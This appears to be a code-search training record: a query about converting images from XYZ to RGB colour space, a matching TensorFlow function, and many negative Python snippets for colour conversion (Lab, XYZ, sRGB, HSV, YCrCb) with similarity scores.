convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def 
_convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def lab_to_rgb(img_l, img_ab):\n lab = np.empty([*img_l.shape[0:2], 3])\n lab[:, :, 0] = np.squeeze(((img_l + 1) * 50))\n lab[:, :, 1:] = img_ab * 127\n return color.lab2rgb(lab)", "def test_srgb_conversion_to_xyz_d65(self):\r\n\r\n xyz = convert_color(self.color, XYZColor)\r\n self.assertColorMatch(xyz, XYZColor(0.294, 0.457, 0.103))", "def test_srgb_conversion_to_xyz_d50(self):\r\n\r\n xyz = convert_color(self.color, XYZColor, target_illuminant='D50')\r\n self.assertColorMatch(xyz, XYZColor(0.313, 0.460, 0.082))", "def rgb2Lab(rgbvalue):\r\n RGB2Lab_Matrix = np.array([[0.412453, 0.357580, 0.180423],\r\n [0.212671, 0.715160, 0.072169],\r\n [0.019334, 0.119193, 0.950227]])\r\n R = rgbvalue[0]\r\n G = rgbvalue[1]\r\n B = rgbvalue[2]\r\n gammaR = gamma(R / 255.0)\r\n gammaG = gamma(G / 255.0)\r\n gammaB = gamma(B / 255.0)\r\n RGBvalue = np.array([gammaR, gammaG, gammaB])\r\n RGBvalue = RGBvalue.reshape(3, 1)\r\n XYZvalue = np.dot(RGB2Lab_Matrix, RGBvalue)\r\n assert XYZvalue.shape == (3, 1)\r\n correction = np.array([[1.0 / 0.950456, 1.0, 1.0 / 1.088754]]).T\r\n assert correction.shape == (3, 1)\r\n XYZ = XYZvalue * correction\r\n assert XYZ.shape == (3, 1)\r\n YYn = ft(XYZ[1])\r\n XXn = ft(XYZ[0])\r\n ZZn = ft(XYZ[2])\r\n L = 116 * YYn - 16\r\n a = 500 * (XXn - YYn)\r\n b = 200 * (YYn - ZZn)\r\n return [int(L), int(a), int(b)]", "def test_adobe_conversion_to_xyz_d50(self):\r\n\r\n adobe = AdobeRGBColor(0.482, 0.784, 0.196)\r\n xyz = convert_color(adobe, XYZColor, target_illuminant='D50')\r\n self.assertColorMatch(xyz, XYZColor(0.247, 0.431, 0.060))" ]
[ "0.72538626", "0.6935359", "0.6835545", "0.6804529", "0.6711759", "0.66599464", "0.6521106", "0.64231324", "0.6351376", "0.63161516", "0.62939584", "0.62429935", "0.6191677", "0.6155172", "0.6133433", "0.60679656", "0.605217", "0.600619", "0.6003839", "0.5994653", "0.5972754", "0.59319156", "0.590566", "0.5903485", "0.59027094", "0.5897333", "0.5878697", "0.5873358", "0.5862743", "0.5847499" ]
0.72095025
1
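Written out, the arithmetic the lab_to_xyz document implements is the standard CIELAB inverse transform; the 95.047 / 100.0 / 108.883 reference white hard-coded in the function corresponds to the D65 illuminant (2° observer):

$$
f_y = \frac{L + 16}{116}, \qquad f_x = \frac{a}{500} + f_y, \qquad f_z = f_y - \frac{b}{200}
$$

$$
g(t) = \begin{cases} t^3 & \text{if } t^3 > 0.008856 \\[4pt] \dfrac{t - 16/116}{7.787} & \text{otherwise} \end{cases}
$$

$$
X = 95.047\, g(f_x), \qquad Y = 100.0\, g(f_y), \qquad Z = 108.883\, g(f_z)
$$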
Convert an image from XYZ color space to RGB color space
def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor: x, y, z = tf.unstack(image, axis=-1) var_x = x / 100 var_y = y / 100 var_z = z / 100 var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986 var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415 var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570 var_r = tf.where(var_r > 0.0031308, 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055, 12.92 * var_r) var_g = tf.where(var_g > 0.0031308, 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055, 12.92 * var_g) var_b = tf.where(var_b > 0.0031308, 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055, 12.92 * var_b) r = var_r * 255 g = var_g * 255 b = var_b * 255 rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8) return rgb_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def XYZ_to_RGB(XYZ,\n illuminant_XYZ,\n illuminant_RGB,\n XYZ_to_RGB_matrix,\n chromatic_adaptation_transform='CAT02',\n encoding_cctf=None):\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n transform=chromatic_adaptation_transform)\n\n XYZ_a = dot_vector(M, XYZ)\n\n RGB = dot_vector(XYZ_to_RGB_matrix, XYZ_a)\n\n if encoding_cctf is not None:\n RGB = encoding_cctf(RGB)\n\n return RGB", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def ycbcr_to_rgb(image: torch.Tensor) -> torch.Tensor:\n y: torch.Tensor = image[..., 0, :, :]\n cb: torch.Tensor = image[..., 1, :, :]\n cr: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n cb_shifted: torch.Tensor = cb - delta\n cr_shifted: torch.Tensor = cr - delta\n\n r: torch.Tensor = y + 1.403 * cr_shifted\n g: torch.Tensor = y - 0.714 * cr_shifted - 0.344 * cb_shifted\n b: torch.Tensor = y + 1.773 * cb_shifted\n return torch.stack([r, g, b], -3)", "def XYZ_to_sRGB(XYZ):\n\n rgb = XYZ_to_sRGB_linear(XYZ)\n rgb = 
sRGB_linear_to_sRGB(rgb)\n\n return rgb", "def rgb(self, xyz: Union[ndarray, Iterable[float]]) -> ndarray:\n return self.value.xyz_to_rgb_matrix @ xyz", "def grey_to_rgb_imitation(img):\n return np.repeat(img[...,np.newaxis], 3, -1)", "def img_to_rgb(img):\r\n if len(img.shape) < 3 or img.shape[2] == 1:\r\n return np.repeat(img, 3).reshape(img.shape[0], img.shape[1], 3)\r\n else:\r\n return img", "def colorize_xyz(xyz):\n xyz_vis = xyz - xyz.min()\n return (255 * xyz_vis / xyz_vis.max()).astype(np.uint8)", "def grey_to_rgb(im):\n assert im.n_channels in [1, 3]\n\n if im.n_channels == 3:\n return im\n\n im.pixels = np.vstack([im.pixels] * 3)\n return im", "def matplotlib_image(image):\n if image.ndim == 2:\n rgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n else:\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return rgb", "def _colored_img_to_arr(image, verbose=False):\n height, width = image.size\n arr = np.array(image.getdata())\n arr = arr.reshape(3, height, width)\n r = arr[0]\n g = arr[1]\n b = arr[2]\n return r, g, b", "def convert_color(image, color_space='RGB'):\n color_space = color_space.lower()\n if color_space != 'rgb':\n if color_space == 'hsv':\n color_transformation = cv2.COLOR_BGR2HSV\n elif color_space == 'luv':\n color_transformation = cv2.COLOR_BGR2LUV\n elif color_space == 'hls':\n color_transformation = cv2.COLOR_BGR2HLS\n elif color_space == 'yuv':\n color_transformation = cv2.COLOR_BGR2YUV\n elif color_space == 'ycrcb':\n color_transformation = cv2.COLOR_BGR2YCrCb\n else:\n raise ValueError('Invalid value %s for color_space parameters. Valid color spaces are: RGB, HSV, LUV, '\n 'HLS, YUV, YCrCb' % color_space)\n\n return cv2.cvtColor(image, color_transformation)\n else:\n return image", "def XYZ_to_RGB_matrix(self):\n\n if not self._use_derived_XYZ_to_RGB_matrix:\n return self._XYZ_to_RGB_matrix\n else:\n return self._derived_XYZ_to_RGB_matrix", "def red_channel(img):\n\n red = np.zeros(img.shape,dtype=float)\n\n red[:,:,2] = np.copy(img[:,:,2])\n\n return red", "def yuv_to_rgb(img_yuv):\n\n y = img_yuv[..., 0]\n u = img_yuv[..., 1]\n v = img_yuv[..., 2]\n\n r = y + 1.14 * v\n g = y - 0.396 * u - 0.581 * v\n b = y + 2.029 * u\n\n img_rgb = np.stack((r, g, b), axis=2)\n img_rgb = np.clip(img_rgb, 0, 1)\n return img_rgb", "def XYZ_to_RGB(cobj, target_rgb, *args, **kwargs):\r\n\r\n temp_X = cobj.xyz_x\r\n temp_Y = cobj.xyz_y\r\n temp_Z = cobj.xyz_z\r\n\r\n logger.debug(\" \\- Target RGB space: %s\", target_rgb)\r\n target_illum = target_rgb.native_illuminant\r\n logger.debug(\" \\- Target native illuminant: %s\", target_illum)\r\n logger.debug(\" \\- XYZ color's illuminant: %s\", cobj.illuminant)\r\n \r\n # If the XYZ values were taken with a different reference white than the\r\n # native reference white of the target RGB space, a transformation matrix\r\n # must be applied.\r\n if cobj.illuminant != target_illum:\r\n logger.debug(\" \\* Applying transformation from %s to %s \",\r\n cobj.illuminant, target_illum)\r\n # Get the adjusted XYZ values, adapted for the target illuminant.\r\n temp_X, temp_Y, temp_Z = apply_chromatic_adaptation(\r\n temp_X, temp_Y, temp_Z,\r\n orig_illum=cobj.illuminant, targ_illum=target_illum)\r\n logger.debug(\" \\* New values: %.3f, %.3f, %.3f\",\r\n temp_X, temp_Y, temp_Z)\r\n \r\n # Apply an RGB working space matrix to the XYZ values (matrix mul).\r\n rgb_r, rgb_g, rgb_b = apply_RGB_matrix(\r\n temp_X, temp_Y, temp_Z,\r\n rgb_type=target_rgb, convtype=\"xyz_to_rgb\")\r\n\r\n # v\r\n linear_channels = dict(r=rgb_r, g=rgb_g, b=rgb_b)\r\n # 
V\r\n nonlinear_channels = {}\r\n if target_rgb == sRGBColor:\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n if v <= 0.0031308:\r\n nonlinear_channels[channel] = v * 12.92\r\n else:\r\n nonlinear_channels[channel] = 1.055 * math.pow(v, 1 / 2.4) - 0.055\r\n else:\r\n # If it's not sRGB...\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n nonlinear_channels[channel] = math.pow(v, 1 / target_rgb.rgb_gamma)\r\n\r\n return target_rgb(\r\n nonlinear_channels['r'], nonlinear_channels['g'], nonlinear_channels['b'])", "def get_color(im_obj):\n #im = Image.open(path, 'r')\n x, y = im_obj.size\n\n r, g, b = 0, 0, 0\n for i in xrange(x):\n for j in xrange(y):\n color_px = im_obj.getpixel((i, j))\n #print color_px\n r += color_px[0]\n g += color_px[1]\n b += color_px[2]\n\n r = r / (x * y)\n g = g / (x * y)\n b = b / (x * y)\n return (r, g, b)", "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def imcast(img, dtype, color_space=\"default\"):\n if img.dtype == dtype:\n return img\n if color_space == \"default\":\n if dtype == np.uint8:\n if img.dtype == np.uint16:\n return np.asarray(img / 257, np.uint8)\n elif img.dtype == np.float32 or img.dtype == np.float64:\n return np.asarray(img * 255., np.uint8)\n elif dtype == np.uint16:\n if img.dtype == np.uint8:\n return np.asarray(img, np.uint16) * 257\n elif img.dtype == np.float32 or img.dtype == np.float64:\n return np.asarray(img * 65535., np.uint16)\n elif dtype == np.float32 or dtype == np.float64:\n if img.dtype == np.uint8:\n return np.asarray(img, dtype) / 255.\n elif img.dtype == np.uint16:\n return np.asarray(img, dtype) / 65535.\n elif img.dtype == np.float32 or img.dtype == np.float64:\n return np.asarray(img, dtype)\n elif color_space == \"CIE-L*a*b*\":\n if dtype == np.uint8:\n if img.dtype == np.float32 or img.dtype == np.float64:\n dst = np.empty(img.shape, np.uint8)\n dst[:,:,0] = img[:,:,0] * 255. / 100.\n dst[:,:,1] = img[:,:,1] + 128.\n dst[:,:,2] = img[:,:,2] + 128.\n return dst\n elif dtype == np.float32 or dtype == np.float64:\n if img.dtype == np.uint8:\n dst = np.empty(img.shape, dtype)\n dst[:,:,0] = np.asarray(img[:,:,0], dtype) / 255. * 100.\n dst[:,:,1] = np.asarray(img[:,:,1], dtype) - 128.\n dst[:,:,2] = np.asarray(img[:,:,2], dtype) - 128.\n return dst\n raise Exception(\n \"Unexpected conversion from '%s' to '%s' with '%s' color space\" % \\\n (img.dtype, dtype, color_space))", "def yuv2rgb(im):\n ## conflicting definitions exist depending on whether you use the full range\n ## of YCbCr or clamp out to the valid range. see here\n ## http://www.equasys.de/colorconversion.html\n ## http://www.fourcc.org/fccyvrgb.php\n from numpy import dot, ndarray, array\n # if not im.dtype == 'uint8':\n # raise ImageUtilsError('yuv2rgb only implemented for uint8 arrays')\n\n ## better clip input to the valid range just to be on the safe side\n yuv = ndarray(im.shape) ## float64\n yuv[:, :, 0] = im[:, :, 0].clip(16, 235).astype(yuv.dtype) - 16\n yuv[:, :, 1:] = im[:, :, 1:].clip(16, 240).astype(yuv.dtype) - 128\n\n ## ITU-R BT.601 version (SDTV)\n A = array([[1., 0., 0.701],\n [1., -0.886 * 0.114 / 0.587, -0.701 * 0.299 / 0.587],\n [1., 0.886, 0.]])\n A[:, 0] *= 255. / 219.\n A[:, 1:] *= 255. 
/ 112.\n\n ## ITU-R BT.709 version (HDTV)\n # A = array([[1.164, 0., 1.793],\n # [1.164, -0.213, -0.533],\n # [1.164, 2.112, 0.]])\n\n rgb = dot(yuv, A.T)\n return rgb.clip(0, 255).astype('uint8')", "def _process_img_rgb(self, sensor_data):\n img = np.array(sensor_data.raw_data).reshape((self.img_y, self.img_x, 4))\n img = img[:, :, :3] # sensor is actualy rgba, we dont need alpha values\n self.rgb = img # need to scale rgb values to be {0,1}", "def RGB_to_XYZ(RGB,\n illuminant_RGB,\n illuminant_XYZ,\n RGB_to_XYZ_matrix,\n chromatic_adaptation_transform='CAT02',\n decoding_cctf=None):\n\n if decoding_cctf is not None:\n RGB = decoding_cctf(RGB)\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n transform=chromatic_adaptation_transform)\n\n XYZ = dot_vector(RGB_to_XYZ_matrix, RGB)\n\n XYZ_a = dot_vector(M, XYZ)\n\n return XYZ_a", "def rgb_to_xy(red, green, blue):\n\n # gamma correction\n red = pow((red + 0.055) / (1.0 + 0.055), 2.4) if red > 0.04045 else (red / 12.92)\n green = pow((green + 0.055) / (1.0 + 0.055), 2.4) if green > 0.04045 else (green / 12.92)\n blue = pow((blue + 0.055) / (1.0 + 0.055), 2.4) if blue > 0.04045 else (blue / 12.92)\n\n # convert rgb to xyz\n x = red * 0.649926 + green * 0.103455 + blue * 0.197109\n y = red * 0.234327 + green * 0.743075 + blue * 0.022598\n z = green * 0.053077 + blue * 1.035763\n\n # convert xyz to xy\n x = x / (x + y + z)\n y = y / (x + y + z)\n\n # TODO check color gamut if known\n \n return [x, y]", "def to_rgb(im):\n w, h = im.shape\n ret = np.empty((w, h, 3), dtype=np.uint8)\n ret[:, :, 2] = ret[:, :, 1] = ret[:, :, 0] = im\n return ret" ]
[ "0.6828028", "0.68103015", "0.68066865", "0.6763418", "0.66843706", "0.66742265", "0.66261303", "0.65840024", "0.6561155", "0.6552539", "0.64690375", "0.645088", "0.63681024", "0.6365761", "0.63621247", "0.6326144", "0.6306346", "0.6306079", "0.6283632", "0.6256421", "0.62433654", "0.62383455", "0.62226963", "0.6117911", "0.6095532", "0.6088051", "0.60821766", "0.60728455", "0.60607404", "0.6055855" ]
0.7146014
0
Convert an image from RGB color space to XYZ color space
def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:
    r, g, b = tf.unstack(image, axis=-1)
    var_r = r / 255
    var_g = g / 255
    var_b = b / 255

    var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),
                     var_r / 12.92)
    var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),
                     var_g / 12.92)
    var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),
                     var_b / 12.92)
    var_r = var_r * 100
    var_g = var_g * 100
    var_b = var_b * 100

    x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805
    y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722
    z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505

    image_xyz = tf.stack([x, y, z], axis=-1)
    return image_xyz
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rgb_to_xyz(rgb_color):\n\n r = (rgb_color[0] / 255)\n g = (rgb_color[1] / 255)\n b = (rgb_color[2] / 255)\n\n if r > 0.04045:\n r = ((r + 0.055) / 1.055) ** 2.4\n else:\n r = r / 12.92\n\n if g > 0.04045:\n g = ((g + 0.055) / 1.055) ** 2.4\n else:\n g = g / 12.92\n\n if b > 0.04045:\n b = ((b + 0.055) / 1.055) ** 2.4\n else:\n b = b / 12.92\n\n r = r * 100\n g = g * 100\n b = b * 100\n x = (r * 0.4124) + (g * 0.3576) + (b * 0.1805)\n y = (r * 0.2126) + (g * 0.7152) + (b * 0.0722)\n z = (r * 0.0193) + (g * 0.1192) + (b * 0.9505)\n\n return x, y, z", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def RGB_to_XYZ(RGB,\n illuminant_RGB,\n illuminant_XYZ,\n RGB_to_XYZ_matrix,\n chromatic_adaptation_transform='CAT02',\n decoding_cctf=None):\n\n if decoding_cctf is not None:\n RGB = decoding_cctf(RGB)\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n transform=chromatic_adaptation_transform)\n\n XYZ = dot_vector(RGB_to_XYZ_matrix, RGB)\n\n XYZ_a = dot_vector(M, XYZ)\n\n return XYZ_a", "def RGB_to_XYZ_matrix(self):\n\n if not self._use_derived_RGB_to_XYZ_matrix:\n return self._RGB_to_XYZ_matrix\n else:\n return self._derived_RGB_to_XYZ_matrix", "def lin_a98rgb_to_xyz(rgb: Vector) -> Vector:\n\n return alg.dot(RGB_TO_XYZ, rgb, dims=alg.D2_D1)", "def rgb_to_xy(red, green, blue):\n\n # gamma correction\n red = pow((red + 0.055) / (1.0 + 0.055), 2.4) if red > 0.04045 else (red / 12.92)\n green = pow((green + 0.055) / (1.0 + 0.055), 2.4) if green > 0.04045 else (green / 12.92)\n blue = pow((blue + 0.055) / (1.0 + 0.055), 2.4) if blue > 0.04045 else (blue / 12.92)\n\n # convert rgb to xyz\n x = red * 0.649926 + green * 0.103455 + blue * 0.197109\n y = red * 0.234327 + green * 0.743075 + blue * 0.022598\n z = green * 0.053077 + blue * 1.035763\n\n # convert xyz to xy\n x = x / (x + y + z)\n y = y / (x + y + z)\n\n # TODO check color gamut if known\n \n return [x, y]", "def lab_to_xyz(image: tf.Tensor) -> tf.Tensor:\n l, a, b = tf.unstack(image, axis=-1)\n\n var_y = (l + 16) / 116\n var_x = a / 500 + var_y\n var_z = var_y - b / 200\n var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3),\n (var_x - 16 / 116) / 7.787)\n var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3),\n (var_y - 16 / 116) / 7.787)\n var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3),\n (var_z - 16 / 116) / 7.787)\n\n refx = 95.047\n 
refy = 100.00\n ref_z = 108.883\n\n x = var_x * refx\n y = var_y * refy\n z = var_z * ref_z\n xyz_image = tf.stack([x, y, z], axis=-1)\n return xyz_image", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def RGB_to_XYZ_matrix(self, value):\n\n if value is not None:\n value = np.asarray(value)\n self._RGB_to_XYZ_matrix = value", "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def RGB_to_XYZ(cobj, target_illuminant=None, *args, **kwargs):\r\n\r\n # Will contain linearized RGB channels (removed the gamma func).\r\n linear_channels = {}\r\n\r\n if isinstance(cobj, sRGBColor):\r\n for channel in ['r', 'g', 'b']:\r\n V = getattr(cobj, 'rgb_' + channel)\r\n if V <= 0.04045:\r\n linear_channels[channel] = V / 12.92\r\n else:\r\n linear_channels[channel] = math.pow((V + 0.055) / 1.055, 2.4)\r\n else:\r\n # If it's not sRGB...\r\n gamma = cobj.rgb_gamma\r\n\r\n for channel in ['r', 'g', 'b']:\r\n V = getattr(cobj, 'rgb_' + channel)\r\n linear_channels[channel] = math.pow(V, gamma)\r\n \r\n # Apply an RGB working space matrix to the XYZ values (matrix mul).\r\n xyz_x, xyz_y, xyz_z = apply_RGB_matrix(\r\n linear_channels['r'], linear_channels['g'], linear_channels['b'],\r\n rgb_type=cobj, convtype=\"rgb_to_xyz\")\r\n\r\n if target_illuminant is None:\r\n target_illuminant = cobj.native_illuminant\r\n \r\n # The illuminant of the original RGB object. 
This will always match\r\n # the RGB colorspace's native illuminant.\r\n illuminant = cobj.native_illuminant\r\n xyzcolor = XYZColor(xyz_x, xyz_y, xyz_z, illuminant=illuminant)\r\n # This will take care of any illuminant changes for us (if source\r\n # illuminant != target illuminant).\r\n xyzcolor.apply_adaptation(target_illuminant)\r\n\r\n return xyzcolor", "def test_srgb_conversion_to_xyz_d65(self):\r\n\r\n xyz = convert_color(self.color, XYZColor)\r\n self.assertColorMatch(xyz, XYZColor(0.294, 0.457, 0.103))", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def linear_rgb2xyz(rgb):\n arr = _prepare_colorarray(rgb).copy()\n return _convert(xyz_from_rgb, arr)", "def test_srgb_conversion_to_xyz_d50(self):\r\n\r\n xyz = convert_color(self.color, XYZColor, target_illuminant='D50')\r\n self.assertColorMatch(xyz, XYZColor(0.313, 0.460, 0.082))", "def ycbcr_to_rgb(image: torch.Tensor) -> torch.Tensor:\n y: torch.Tensor = image[..., 0, :, :]\n cb: torch.Tensor = image[..., 1, :, :]\n cr: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n cb_shifted: torch.Tensor = cb - delta\n cr_shifted: torch.Tensor = cr - delta\n\n r: torch.Tensor = y + 1.403 * cr_shifted\n g: torch.Tensor = y - 0.714 * cr_shifted - 0.344 * cb_shifted\n b: torch.Tensor = y + 1.773 * cb_shifted\n return torch.stack([r, g, b], -3)", "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def colorize_xyz(xyz):\n xyz_vis = xyz - xyz.min()\n return (255 * xyz_vis / xyz_vis.max()).astype(np.uint8)", "def _convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def XYZ_to_RGB(cobj, target_rgb, *args, 